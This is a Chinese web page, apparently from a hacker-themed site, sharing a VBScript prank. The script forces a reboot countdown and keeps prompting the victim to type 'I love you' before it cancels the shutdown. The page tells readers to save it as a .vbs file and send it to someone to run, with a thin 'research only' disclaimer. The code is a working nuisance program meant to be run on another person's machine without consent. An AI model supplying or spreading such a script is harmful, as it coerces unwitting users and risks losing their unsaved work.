复制代码 代码如下:

set ierunner=createobject(“wscript.shell”)

ierunner.run “cmd /c start http://www.baidu.com/”,0

wscript.sleep 2000

ierunner.sendkeys “%{F4}”

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject(“wscript.shell”)

WSHshellA.run “cmd.exe /c shutdown -r -t 8 -c “”快说你爱我・・・”” “,0 ,true

dim a

do while(a <> “我爱你”)

a = inputbox (“说你爱我,就不关机,快点,说 “”我爱你”” “,”说不说”,”不说”,8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,”MsgBox”

loop

msgbox chr(13) + chr(13) + chr(13) + “早说就行了嘛”

dim WSHshell

set WSHshell = wscript.createobject(“wscript.shell”)

WSHshell.run “cmd.exe /c shutdown -a”,0 ,true

msgbox chr(13) + chr(13) + chr(13) + “哈哈哈哈,真过瘾”

把分隔线里面的内容保存为任意.vbs的文件名 发送给对方运行就OK

解除方法 开始 运行 shutdown -a 回车 怕女的不太懂什么解除 特别说明crack8_编程小组[K.8] 各种群共享都有这分源码 仅供研究 请勿非法用途
您可能感兴趣的文章:

声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。